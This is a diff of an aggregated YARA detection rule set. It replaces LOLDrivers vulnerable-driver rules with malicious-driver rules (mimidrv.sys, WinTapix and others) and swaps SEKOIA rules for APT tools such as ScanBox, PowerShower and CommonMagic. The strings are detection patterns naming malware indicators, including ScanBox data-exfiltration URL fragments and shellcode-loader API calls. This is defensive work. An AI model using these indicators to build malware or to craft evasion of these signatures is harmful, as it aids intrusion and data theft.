+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032003000320032002e0031002e00310036002e0031003000300030 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00640077006100640073006100660065006c006f00610064002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]76fe7f514e3b52a896325fa17cfb7edf }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00640077006100640073006100660065006c006f00610064002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000320032 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_9679 : FILE
+rule LOLDRIVERS_MAL_Driver_Paloaltonetworksinc_Cyvrlpcsys_Cortexxdradvancedendpointprotection_2CD7
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - elbycdio.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - idmtdi.sys"
 		author = "Florian Roth"
-		id = "a1b5efd0-2dd2-5c54-86b6-12684d6ea56b"
+		id = "e0bb1b7c-2ce2-5ab8-96fe-0f1d7c26c8b3"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11876-L11895"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L774-L793"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "9679758455c69877fce866267d60c39d108b495dca183954e4af869902965b3d"
-		logic_hash = "fa486cd644c20c827abc8568933d8537c254cff445f2aef520775e119b6db067"
-		score = 40
+		hash = "2cd7a0c4e8d24404c92e4ed8539b2136028a8ca663f3432e417b00665493e13f"
+		logic_hash = "8f4bf095708c18a441369088b362fb65779c7009bf1c2e8ac2a8e06ef0af44c0"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0045006c0062007900430044002000570069006e0064006f00770073002000780036003400200049002f004f0020006400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0045006c00610062006f0072006100740065002000420079007400650073002000410047 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002c00200030002c00200031002c00200031 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002c00200030002c00200030002c00200030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0045006c00620079004300440049004f }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043004400520054006f006f006c0073 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0045006c00620079004300440049004f002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003000300020002d0020003200300030003800200045006c00610062006f0072006100740065002000420079007400650073002000410047 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0043006f007200740065007800200058004400520020004c005000430020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500061006c006f00200041006c0074006f0020004e006500740077006f0072006b0073002c00200049006e0063002e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0038002e0032002e0032002e00340039003700300038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0038002e0032002e0032002e00340039003700300038 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0063007900760072006c00700063002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043006f00720074006500780020005800440052212200200041006400760061006e00630065006400200045006e00640070006f0069006e0074002000500072006f00740065006300740069006f006e }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0063007900760072006c00700063002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a9002000500061006c006f00200041006c0074006f0020004e006500740077006f0072006b0073002c00200049006e0063002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Elaboratebytesag_Elbycdio_Cdrtools_8137 : FILE
+rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Srvnetsys_Microsoftwindowsoperatingsystem_F6C3
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - elbycdio.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - WinTapix.sys, SRVNET2.SYS"
 		author = "Florian Roth"
-		id = "0e696bff-b5da-5116-a5a7-341b6c3098b8"
+		id = "3559718f-59d7-5bff-860c-6a073f4c05d9"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11898-L11917"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L796-L815"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "8137ce22d0d0fc5ea5b174d6ad3506a4949506477b1325da2ccb76511f4c4f60"
-		logic_hash = "cd4ace0ee1000ec8367bdca57423f311d0993d54359e4b3ca6a503738ba07b3b"
-		score = 40
+		hash = "f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d"
+		logic_hash = "ab1aea5cec71668c0e35ea149b9e537c8468738c3b3e70382ebedf51bb8729d0"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0045006c0062007900430044002000570069006e0064006f007700730020004e0054002f0032003000300030002f0058005000200049002f004f0020006400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0045006c00610062006f0072006100740065002000420079007400650073002000410047 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002c00200030002c00200031002c00200030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002c00200030002c00200030002c00200030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0045006c00620079004300440049004f }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0043004400520054006f006f006c0073 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0045006c00620079004300440049004f002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800430029002000320030003000300020002d0020003200300030003700200045006c00610062006f0072006100740065002000420079007400650073002000410047 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0053006500720076006500720020004e006500740077006f0072006b0020006400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310030002e0030002e00310038003300360032002e0036003900330020002800570069006e004200750069006c0064002e003100360030003100300031002e00300038003000300029 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310030002e0030002e00310038003300360032002e003600390033 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005300520056004e004500540032002e005300590053 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f0066007400ae002000570069006e0064006f0077007300ae0020004f007000650072006100740069006e0067002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005300520056004e004500540032002e005300590053 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Asmediatechnologyinc_Asmiosys_Asmediapcidriver_E465 : FILE
+rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Wantdsys_Microsoftwindowsoperatingsystem_81C7
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - AsmIo64.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - wantd_3.sys"
 		author = "Florian Roth"
-		id = "196ff2dc-bbf5-5728-bcc9-29fa774b1e84"
+		id = "43ae822a-c4c4-5525-bfd3-a05d1ec50bd0"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11920-L11939"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L818-L837"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "e4658d93544f69f5cb9aa6d9fec420fecc8750cb57e1e9798da38c139d44f2eb"
-		logic_hash = "93c9c472f0664eabf5aeba70babe66f974fd79eaf37b65987c396e35faea4d4b"
-		score = 40
+		hash = "81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1"
+		logic_hash = "ec9e321bbc89bffb6243e3edde45e60dc06513e88dfb9a262768ef081db60c5b"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00410073006d006500640069006100200050004300490020004400720069007600650072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00410073006d006500640069006100200054006500630068006e006f006c006f00670079002000200049006e0063002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0031002e00300030003000300020006200750069006c0074002000620079003a002000570069006e00440044004b }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030002e0031002e0030003000300030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00410073006d0049006f002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00410073006d006500640069006100200050004300490020004400720069007600650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00410073006d0049006f002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a9002000410073006d006500640069006100200054006500630068006e006f006c006f00670079002e }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00570041004e0020005400720061006e00730070006f007200740020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0035002e0032002e0033003700390030002e003900330038 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0035002e0032002e0033003700390030002e003900330038 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00770061006e00740064002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f00660074002000570069006e0064006f007700730020004f007000650072006100740069006e0067002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00770061006e00740064002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Paragonsoftwaregmbh_Biontdrv_Paragonsystemutilities_FB0D : FILE
+rule LOLDRIVERS_MAL_Driver_773B
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - BioNTdrv.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
 		author = "Florian Roth"
-		id = "4c894211-9f20-562f-9e96-49c39fa690bf"
+		id = "f47ab2f1-86f6-5550-939e-4477ec1c367c"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11942-L11960"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L840-L854"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "fb0dbc3b9c897b7571b94fb2203ffb1ac0facfe366b2cb1f91904ea5335018f0"
-		logic_hash = "1595824ab80a148d35a7dd7b389e14a6a2d7626e0ed7a49956a2574ff41f8b50"
-		score = 40
+		hash = "773b4a1efb9932dd5116c93d06681990759343dfe13c0858d09245bc610d5894"
+		logic_hash = "5e01850384ac0dc0e9f33e3e217e0e824cfe3c2bb46feff94dffa070f2f7c9a0"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041002000700061007200740020006f0066002000500061007200610067006f006e002000530079007300740065006d0020005500740069006c00690074006900650073 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500061007200610067006f006e00200053006f00660074007700610072006500200047006d00620048 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0033002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]00620069006f006e0074006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00500061007200610067006f006e002000530079007300740065006d0020005500740069006c00690074006900650073 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]00620069006f006e0074006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200031003900390034002d0032003000310037002000500061007200610067006f006e00200053006f00660074007700610072006500200047006d00620048 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0031002e0031002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0031002e0031002e0030 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d002000320030003100370020 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Pulsesecurellc_Neofltr_Secureapplicationmanager_8DBC : FILE
+rule LOLDRIVERS_MAL_Driver_Sensecorp_7F45
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - jnprva.sys, neofltr.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - Sense5Ext.sys"
 		author = "Florian Roth"
-		id = "64001b48-e8f6-562c-ba15-0fe98882781c"
+		id = "6c1f5ba4-fd14-5069-9d99-e3072b2dbbc2"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11963-L11982"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L857-L873"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "8dbc28fefb8cf9377be55a7c6062988df5a24f0ff475f6dd65cf07fe5173f51d"
-		logic_hash = "2bd8b8400552d8a0d8aced78dc5ca87f69d6495229d3eae7eb4a1e63a218cf3f"
-		score = 40
+		hash = "7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6"
+		logic_hash = "dbef723d7e44da110675402fc13708c5b077eeb6a66c1772885f5879d795ec4e"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004e0065007400420049004f0053002000520065006400690072006500630074006f0072 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500075006c007300650020005300650063007500720065002c0020004c004c0043 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0038002c0033002c0033002c0031003300350030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0038002c0033002c0033002c0031003300350030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e0065006f0066006c00740072 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0053006500630075007200650020004100700070006c00690063006100740069006f006e0020004d0061006e0061006700650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e0065006f0066006c00740072002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a900200032003000310034002d0032003000310038002000620079002000500075006c007300650020005300650063007500720065002c0020004c004c0043002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]00530065006e0073006500350020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00530065006e00730065003500200043004f00520050 }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0036002e0030002e0030 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0036002e0030002e0030 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000320032 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		all of them
 }
-rule LOLDRIVERS_PUA_VULN_Driver_Avastsoftware_Aswarpotsys_Avastantivirus_4DA0 : FILE
+rule LOLDRIVERS_MAL_Driver_Microsoftcorporation_Ndislansys_Microsoftwindowsoperatingsystem_B0EB
 {
 	meta:
-		description = "Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - aswArPot.sys, avgArPot.sys"
+		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - ndislan.sys"
 		author = "Florian Roth"
-		id = "bde91bb0-9211-5fea-b725-d556c5a3ccc9"
+		id = "c94adcf3-2ea6-5856-9327-2e5ed1c49b22"
 		date = "2025-03-07"
 		modified = "2025-03-07"
 		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_vuln_drivers_strict.yar#L11985-L12004"
+		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L876-L895"
 		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "4da08c0681fbe028b60a1eaf5cb8890bd3eba4d0e6a8b976495ddcd315e147ba"
-		logic_hash = "c8f2c5a171d1a7192a2eaeae0ab70ce97956b93e68db7a41265e54480bd582f1"
-		score = 40
+		hash = "b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427"
+		logic_hash = "4b92b69636dea19a23172def47e9a1bbd4507075ec118b48db30fec377b8fbff"
+		score = 70
 		quality = 80
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0041007600610073007400200061006e0074006900200072006f006f0074006b00690074 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0041005600410053005400200053006f006600740077006100720065 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]00310038002e0037002e0034003000310036002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]00310038002e0037002e0034003000310036002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0041007600610073007400200041006e00740069007600690072007500730020 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006100730077004100720050006f0074002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f007000790072006900670068007400200028006300290020003200300031003800200041005600410053005400200053006f006600740077006100720065 }
+		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004d00530020004c0041004e0020004400720069007600650072 }
+		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e }
+		$ = { 00460069006c006500560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e0031003400320031 }
+		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0031002e0037003600300030002e0031003400320031 }
+		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e006400690073006c0061006e002e007300790073 }
+		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]004d006900630072006f0073006f0066007400ae002000570069006e0064006f0077007300ae0020004f007000650072006100740069006e0067002000530079007300740065006d }
+		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e006400690073006c0061006e002e007300790073 }
+		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00a90020004d006900630072006f0073006f0066007400200043006f00720070006f0072006100740069006f006e002e00200041006c006c0020007200690067006800740073002000720065007300650072007600650064002e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
 /*
  * YARA Rule Set
  * Repository Name: SEKOIA
  * Repository: https://github.com/SEKOIA-IO/Community
- * Retrieval Date: 2025-06-08
- * Git Commit: e00b1ef08f974e483260719ce04b78fa8b79ee56
+ * Retrieval Date: 2025-06-15
+ * Git Commit: fb46d75846c170609b3d8241401bb9482d4fa708
  * Number of Rules: 746
  * Skipped: 0 (age), 3 (quality), 0 (score), 0 (importance)
  *
@@ -226744,22 +227230,18 @@ If you use the Rules (including in modified form) on data, messages based on mat
 THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES.
 
  */
-rule SEKOIA_Apt_Redhotel_Maliciouslnk_Strings : FILE
+rule SEKOIA_Apt_Scanbox_Framework_Not_Obfuscated : FILE
 {
 	meta:
-		description = "Detects RedHotel's malicious LNKs"
+		description = "Detects the non obfuscated version of ScanBox"
 		author = "Sekoia.io"
-		id = "df2f0002-7921-4378-a936-ea0de5fbfa5a"
-		date = "2024-09-06"
+		id = "4790f122-89de-4f7b-a25f-9ac7b1af8333"
+		date = "2022-09-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_redhotel_maliciouslnk_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "8e2c17040ec78cbcdc07bb2cf9dd7e01"
-		hash = "dc613a519e515ca817fdfb88f81fc9d7"
-		hash = "6f7d85c196c277a6a619f6d94b8f69b9"
-		hash = "b04d484d1e1d793b04af2a5fb88a8a57"
-		logic_hash = "c1d64b3eca5961d7eaab82a6934299642a70301ef791493a371ae5a29376225f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_scanbox_framework_not_obfuscated.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "52779571eb4e68442542a1c4cff58d5b00a264bb567396126cd93dc4ec4eda45"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -226767,89 +227249,86 @@ rule SEKOIA_Apt_Redhotel_Maliciouslnk_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "desktop-" ascii
-		$ = ".\\1.docx" wide
-		$ = ".\\1.pdf" wide
-		$ = ".\\1.doc" wide
-		$ = ".\\1.ppt" wide
-		$ = ".\\1.pptx" wide
-		$ = "MACOS" wide
+		$ = "php?m=a&data="
+		$ = "php?m=p&data="
+		$ = ".fun.split_data = function"
+		$ = ".php?data="
+		$ = ".php?m=b"
+		$ = "basic.apipath"
+		$ = ".info.seed ="
+		$ = "loadjs ="
+		$ = "info.color = screen.colorDepth"
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and 3 of them
+		5 of them and filesize < 500KB
 }
-rule SEKOIA_Loader_Win_Goshellcode : FILE
+rule SEKOIA_Apt_Cloudatlas_Powershower_Clean : FILE
 {
 	meta:
-		description = "Finds GoShellcode samples based on the specific strings"
+		description = "Detects clean version of PowerShower"
 		author = "Sekoia.io"
-		id = "61346225-325a-4067-a4d6-3b8c001dd380"
-		date = "2023-11-15"
+		id = "4a7c37df-3f53-4190-a86f-94bba3df628e"
+		date = "2022-12-05"
 		modified = "2024-12-19"
-		reference = "https://github.com/yoda66/GoShellcode/blob/main/gosc.go"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_goshellcode.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "48ec87f284fbd14cbdb6b6b0f2e0fa6eb5ea19f112648660e0b8e525c562e3fc"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_cloudatlas_powershower_clean.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "24ea6ec0cd8dbcebdf7e42dbd48319562d8682fefd5d0d464a3a5c4b90be40f3"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "94445af999055bf7d7cddc0d1d5183ab2776d85285f0522a28fac6c5a6101906"
-		hash2 = "fdea8b01b2597ceafe6f08b5fd12cc603b1e3ce2037731c0b6defde6935b1ce0"
 
 	strings:
-		$str01 = "main.VirtualAlloc" ascii
-		$str02 = "main.RtlMoveMemory" ascii
-		$str03 = "syscall.Syscall" ascii
-		$str04 = "syscall.NewLazyDLL" ascii
-		$str05 = "runtime.getGetProcAddress" ascii
-		$str06 = "runtime.useAeshash" ascii
+		$ = "[io.file]::WriteAllBytes($zipfile" ascii wide
+		$ = "System.IO.File]::Exists($p_t" ascii wide
+		$ = "HttpRequestP" ascii wide
+		$ = "$http_request.getOption(2)" ascii wide
+		$ = "HttpRequestP($url)" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $str* ) and filesize < 8MB
+		uint8( 0 ) == 0x24 and filesize < 4000 and 4 of them
 }
-
-rule SEKOIA_Icebot_Exported_Function : FILE
+rule SEKOIA_Apt_Badmagic_Commonmagic_Usbstealer : FILE
 {
 	meta:
-		description = "Detects the IceBot RAT used by FIN7 based on the exported function"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "1a1fb651-6ce3-4751-be23-c27a3d8dabde"
-		date = "2022-01-17"
+		id = "37d5becc-f1c3-4400-bc10-cd6036d4dbb1"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/icebot_exported_function.yar#L4-L24"
